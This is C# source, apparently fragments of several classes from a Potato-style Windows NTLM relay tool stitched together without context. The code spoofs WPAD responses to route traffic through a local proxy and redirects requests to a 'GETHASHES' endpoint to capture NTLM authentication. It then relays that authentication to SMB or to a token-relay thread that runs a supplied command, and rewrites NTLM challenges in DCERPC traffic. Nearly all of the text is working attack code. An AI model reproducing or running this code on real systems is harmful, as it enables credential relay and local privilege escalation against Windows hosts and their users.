public byte[] GetChallengeMessageBytes(byte[] negotiateMessageBytes)
{
byte[] challengeMessageBytes = SSPIHelper.GetType2Message(negotiateMessageBytes, out m_serverContext);
ChallengeMessage message = new ChallengeMessage(challengeMessageBytes);
m_serverChallenge = message.ServerChallenge;
return(challengeMessageBytes);
}
public SMB2_SessionSetupResponse SendSessionSetupRequests(NetworkCredential optionalCredential = null)
{
SSPIHelper MyHelper = new SSPIHelper(_server);
if (optionalCredential != null)
{
MyHelper.LoginClient(optionalCredential);
}
byte[] ServerSSPIPacket = null;
byte[] ClientSSPIPacket;
byte[] MIC = null;
bool bContinueProcessing = true;
while (bContinueProcessing)
{
MyHelper.InitializeClient(out ClientSSPIPacket, ServerSSPIPacket, out bContinueProcessing);
if (!bContinueProcessing)
{
byte[] temp;
MyHelper.SignMessage(mechTypes, out temp);
MIC = new byte[temp.Length - mechTypes.Length];
Array.Copy(temp, mechTypes.Length, MIC, 0, temp.Length - mechTypes.Length);
sessionkey = MyHelper.GetSessionKey();
}
var packet = BuildSessionSetupPacket(ClientSSPIPacket, MIC);
SendPacket(packet);
Trace.WriteLine("SessionSetup Packet sent");
var answer = ReadPacket();
var header = ReadSMB2Header(answer);
Trace.WriteLine("SessionSetup Packet received");
if (header.Status == 0)
{
return(ReadResponse <SMB2_SessionSetupResponse>(answer));
}
if (header.Status != STATUS_MORE_PROCESSING_REQUIRED)
{
Trace.WriteLine("Checking " + _server + "Error " + header.Status);
throw new Win32Exception((int)header.Status);
}
if (!bContinueProcessing)
{
Trace.WriteLine("Checking " + _server + "Error " + header.Status + " when no processing needed");
throw new Win32Exception((int)header.Status, "Unexpected SessionSetup error");
}
var sessionSetupResponse = ReadResponse <SMB2_SessionSetupResponse>(answer);
_sessionid = header.SessionId;
// extract SSP answer from GSSPAPI answer
ServerSSPIPacket = ExtractSSP(answer, sessionSetupResponse);
}
throw new NotImplementedException("Not supposed to be here");
}
public KerberosAuthenticator(string hostname, NetworkCredential credential, string principal)
{
if (credential == null)
{
_username = Environment.UserName + "@" + System.Net.NetworkInformation.IPGlobalProperties.GetIPGlobalProperties().DomainName.ToUpper();
}
else
{
_username = credential.UserName + "@" + credential.Domain;
}
_sspi = new SSPIHelper(hostname, credential, principal);
}
public byte[] GenerateServerChallenge()
{
NegotiateMessage negotiateMessage = new NegotiateMessage();
negotiateMessage.NegotiateFlags = NegotiateFlags.NegotiateUnicode | NegotiateFlags.NegotiateOEM | NegotiateFlags.RequestTarget | NegotiateFlags.NegotiateSign | NegotiateFlags.NegotiateSeal | NegotiateFlags.NegotiateLanManagerKey | NegotiateFlags.NegotiateNTLMKey | NegotiateFlags.NegotiateAlwaysSign | NegotiateFlags.NegotiateVersion | NegotiateFlags.Negotiate128 | NegotiateFlags.Negotiate56;
negotiateMessage.Version = Authentication.Version.Server2003;
byte[] negotiateMessageBytes = negotiateMessage.GetBytes();
byte[] challengeMessageBytes = SSPIHelper.GetType2Message(negotiateMessageBytes, out m_serverContext);
ChallengeMessage challengeMessage = new ChallengeMessage(challengeMessageBytes);
m_serverChallenge = challengeMessage.ServerChallenge;
return(m_serverChallenge);
}
/// <summary>
/// Note: The 'limitblankpassworduse' (Under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa)
/// will cause AcceptSecurityContext to return SEC_E_LOGON_DENIED when the correct password is blank.
/// </summary>
public User Authenticate(string accountNameToAuth, byte[] lmResponse, byte[] ntlmResponse)
{
if (accountNameToAuth == String.Empty ||
(String.Equals(accountNameToAuth, "Guest", StringComparison.InvariantCultureIgnoreCase) && IsPasswordEmpty(lmResponse, ntlmResponse) && this.EnableGuestLogin))
{
int guestIndex = IndexOf("Guest");
if (guestIndex >= 0)
{
return(this[guestIndex]);
}
return(null);
}
int index = IndexOf(accountNameToAuth);
if (index >= 0)
{
// We should not spam the security event log, and should call the Windows LogonUser API
// just to verify the user has a blank password.
if (!AreEmptyPasswordsAllowed() &&
IsPasswordEmpty(lmResponse, ntlmResponse) &&
LoginAPI.HasEmptyPassword(accountNameToAuth))
{
throw new EmptyPasswordNotAllowedException();
}
AuthenticateMessage authenticateMessage = new AuthenticateMessage();
authenticateMessage.NegotiateFlags = NegotiateFlags.NegotiateUnicode | NegotiateFlags.NegotiateOEM | NegotiateFlags.RequestTarget | NegotiateFlags.NegotiateSign | NegotiateFlags.NegotiateSeal | NegotiateFlags.NegotiateLanManagerKey | NegotiateFlags.NegotiateNTLMKey | NegotiateFlags.NegotiateAlwaysSign | NegotiateFlags.NegotiateVersion | NegotiateFlags.Negotiate128 | NegotiateFlags.Negotiate56;
authenticateMessage.UserName = accountNameToAuth;
authenticateMessage.LmChallengeResponse = lmResponse;
authenticateMessage.NtChallengeResponse = ntlmResponse;
authenticateMessage.Version = Authentication.Version.Server2003;
byte[] authenticateMessageBytes = authenticateMessage.GetBytes();
bool success = SSPIHelper.AuthenticateType3Message(m_serverContext, authenticateMessageBytes);
if (success)
{
return(this[index]);
}
}
return(null);
}
/// <summary>
/// Note: The 'limitblankpassworduse' (Under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa)
/// will cause AcceptSecurityContext to return SEC_E_LOGON_DENIED when the correct password is blank.
/// </summary>
public User Authenticate(byte[] authenticateMessageBytes)
{
AuthenticateMessage message = new AuthenticateMessage(authenticateMessageBytes);
if ((message.NegotiateFlags & NegotiateFlags.NegotiateAnonymous) > 0 ||
(String.Equals(message.UserName, "Guest", StringComparison.InvariantCultureIgnoreCase) && IsPasswordEmpty(message) && this.EnableGuestLogin))
{
int guestIndex = IndexOf("Guest");
if (guestIndex >= 0)
{
return(this[guestIndex]);
}
return(null);
}
int index = IndexOf(message.UserName);
if (index >= 0)
{
// We should not spam the security event log, and should call the Windows LogonUser API
// just to verify the user has a blank password.
if (!AreEmptyPasswordsAllowed() &&
IsPasswordEmpty(message) &&
LoginAPI.HasEmptyPassword(message.UserName))
{
throw new EmptyPasswordNotAllowedException();
}
bool success = SSPIHelper.AuthenticateType3Message(m_serverContext, authenticateMessageBytes);
if (success)
{
return(this[index]);
}
}
return(null);
}
//
public void recvRequest(object sender, HttpRequestEventArgs e)
{
using (var writer = new StreamWriter(e.Response.OutputStream))
{
HttpRequest request = e.Request;
HttpResponse response = e.Response;
System.Collections.Specialized.NameValueCollection headers = request.Headers;
Console.WriteLine("Got Request: " + request.HttpMethod + " " + request.Url.AbsoluteUri.ToString() + "!");
if (request.HttpMethod.ToLower().Equals("head") || request.HttpMethod.ToLower().Equals("get") || request.HttpMethod.ToLower().Equals("post") || request.HttpMethod.ToLower().Equals("options") || request.HttpMethod.ToLower().Equals("put"))
{
if (request.Url.AbsoluteUri.ToString().Contains("GETHASHES"))
{
Console.WriteLine("Sending 401...");
if (headers["Authorization"] == null && workingUri == null)
{
Console.WriteLine("Got request for hashes...");
response.Headers.Add("WWW-Authenticate", "NTLM");
response.StatusCode = 401;
state = 0;
}
else
{
String authHeader = headers["Authorization"];
byte[] ntlmBlock = getNtlmBlock(authHeader);
if (ntlmBlock != null && (workingUri == null || workingUri == request.Url.AbsoluteUri.ToString()))
{
workingUri = request.Url.AbsoluteUri.ToString();
if (state == 0)
{
//
if (this.enable_token != null)
{
byte[] out_buffer = null;
tokenRelayThread = new Thread(() => sspihelp.TokenRelay(new_ntlmQueueIn, new_ntlmQueueOut));
new_ntlmQueueIn.Add(ntlmBlock);
tokenRelayThread.Start();
out_buffer = new_ntlmQueueOut.Take();
if (out_buffer != null)
{
response.Headers.Add("WWW-Authenticate", "NTLM " + Convert.ToBase64String(out_buffer));
state = state + 1;
response.StatusCode = 401;
}
}
else
{
smbRelayThread = new Thread(() => smbRelay.startSMBRelay(ntlmQueue, this.cmd));
ntlmQueue.Clear();
smbRelayThread.Start();
ntlmQueue.Enqueue(ntlmBlock);
byte[] challenge = null;
Config.signalHandlerClient.WaitOne();
challenge = ntlmQueue.Dequeue();
Console.WriteLine("Got SMB challenge " + Convert.ToBase64String(challenge));
if (challenge != null)
{
response.Headers.Add("WWW-Authenticate", "NTLM " + Convert.ToBase64String(challenge));
state = state + 1;
response.StatusCode = 401;
}
}
}
else if (state == 1 && request.Url.AbsoluteUri.ToString().Equals(workingUri))
{
if (ntlmBlock[8] == 3)
{
//Console.WriteLine(Convert.ToBase64String(ntlmBlock));
}
//
if (this.enable_token != null)
{
new_ntlmQueueIn.Add(ntlmBlock);
response.StatusCode = 200;
state = state + 1;
byte[] checkStatus = new_ntlmQueueOut.Take();
if (checkStatus[0] == 99)
{
writer.Close();
tokenRelayThread.Abort();
finished.Set();
return;
}
else
{
workingUri = null;
tokenRelayThread.Abort();
new_ntlmQueueIn = new BlockingCollection <byte[]>();
new_ntlmQueueOut = new BlockingCollection <byte[]>();
sspihelp = new SSPIHelper();
writer.Close();
state = 0;
}
}
else
{
ntlmQueue.Enqueue(ntlmBlock);
Config.signalHandler.Set();
response.StatusCode = 200;
state = state + 1;
Config.signalHandlerClient.WaitOne();
byte[] checkStatus = ntlmQueue.Dequeue();
if (checkStatus[0] == 99)
{
writer.Close();
smbRelayThread.Abort();
finished.Set();
return;
}
else
{
workingUri = null;
smbRelayThread.Abort();
ntlmQueue = new Queue <byte[]>();
smbRelay = new SMBRelay();
writer.Close();
state = 0;
}
}
}
}
}
writer.Close();
return;
}
///
else if (request.Url.AbsoluteUri.ToString().Equals("http://127.0.0.1/wpad.dat") || request.Url.AbsoluteUri.ToString().Equals("http://wpad/wpad.dat"))
{
Console.WriteLine("Spoofing wpad...");
response.StatusCode = 200;
String responseTxt = "function FindProxyForURL(url,host){if (dnsDomainIs(host, \"localhost\")) return \"DIRECT\";";
for (int i = 0; i < wpad_exclude.Length; i++)
{
responseTxt = responseTxt + "if (dnsDomainIs(host, \"" + wpad_exclude[i] + "\")) return \"DIRECT\";";
}
responseTxt = responseTxt + "return \"PROXY 127.0.0.1:80\";}";
writer.Write(responseTxt);
}
else if (workingUri == null && !request.Url.AbsoluteUri.ToString().Contains("wpad") && !request.Url.AbsoluteUri.ToString().Contains("favicon"))
{
Random rnd = new Random();
int sess = rnd.Next(1, 1000000);
response.Headers.Add("Location", "http://localhost:" + srvPort + "/GETHASHES" + sess);
Console.WriteLine("Redirecting to target.." + response.Headers["Location"]);
response.StatusCode = 302;
writer.Close();
}
}
//
else if (request.HttpMethod.ToLower().Equals("propfind"))
{
if (request.Url.AbsoluteUri.ToString().Contains("http://localhost/test"))
{
Console.WriteLine("Got PROPFIND for /test... Responding");
response.StatusCode = 207;
response.ContentType = "application/xml";
writer.Write("<?xml version='1.0' encoding='UTF-8'?><ns0:multistatus xmlns:ns0=\"DAV:\"><ns0:response><ns0:href>/test/</ns0:href><ns0:propstat><ns0:prop><ns0:resourcetype><ns0:collection /></ns0:resourcetype><ns0:creationdate>2015-08-03T14:53:38Z</ns0:creationdate><ns0:getlastmodified>Tue, 11 Aug 2015 15:48:25 GMT</ns0:getlastmodified><ns0:displayname>test</ns0:displayname><ns0:lockdiscovery /><ns0:supportedlock><ns0:lockentry><ns0:lockscope><ns0:exclusive /></ns0:lockscope><ns0:locktype><ns0:write /></ns0:locktype></ns0:lockentry><ns0:lockentry><ns0:lockscope><ns0:shared /></ns0:lockscope><ns0:locktype><ns0:write /></ns0:locktype></ns0:lockentry></ns0:supportedlock></ns0:prop><ns0:status>HTTP/1.1 200 OK</ns0:status></ns0:propstat></ns0:response></ns0:multistatus>");
writer.Close();
}
else
{
Console.WriteLine("Got PROPFIND for " + request.Url.AbsoluteUri.ToString() + " returning 404");
response.StatusCode = 404;
writer.Close();
}
}
else
{
Console.WriteLine("Got " + request.HttpMethod + " for " + request.Url.AbsoluteUri.ToString() + " replying 404");
response.StatusCode = 404;
writer.Close();
}
}
}
private byte[] doNTLMMagic(byte[] buf)
{
byte[] ret_bytes = buf;
if (tokenRelayThread == null)
{
SSPIHelper tokenRelay = new SSPIHelper();
tokenRelayThread = new Thread(() => tokenRelay.TokenRelay(new_ntlmQueueIn, new_ntlmQueueOut, cmd));
}
try
{
byte[] ntlm_bytes = NTLMExtract(buf);
if (ntlm_bytes != null)
{
if (ntlm_bytes != null)
{
if (ntlm_bytes[8] == 1)
{
if (enable_token != null)
{
Console.WriteLine("GOT TYPE1 MESSAGE TOKEN-RELAY!");
new_ntlmQueueIn.Add(ntlm_bytes);
tokenRelayThread.Start();
challenge = new_ntlmQueueOut.Take();
}
}
else if (ntlm_bytes[8] == 2)
{
Console.WriteLine("GOT TYPE2 MESSAGE (CHALLENGE) from RPCs");
if (challengeCount > 0 || !dropFirst)
{
ret_bytes = replaceChallenge(buf, challenge);
}
challengeCount = challengeCount + 1;
}
else if (ntlm_bytes[8] == 3)
{
if (enable_token != null)
{
Console.WriteLine("GOT TYPE3 MESSAGE (AUTH) TOKEN-RELAY");
new_ntlmQueueIn.Add(ntlm_bytes);
byte[] checkStatus = new_ntlmQueueOut.Take();
if (checkStatus[0] == 99)
{
Thread.Sleep(500); // Incase its not finished!
tokenRelayThread.Abort();
DCERPCNtlmHandler.finished.Set();
// this.disconnected.Set();
}
else
{
new_ntlmQueueIn = new BlockingCollection <byte[]>();
new_ntlmQueueOut = new BlockingCollection <byte[]>();
challengeCount = 0;
tokenRelayThread = null;
}
}
}
}
}
}
catch (Exception e)
{
Console.WriteLine(e);
return(ret_bytes);
}
return(ret_bytes);
}
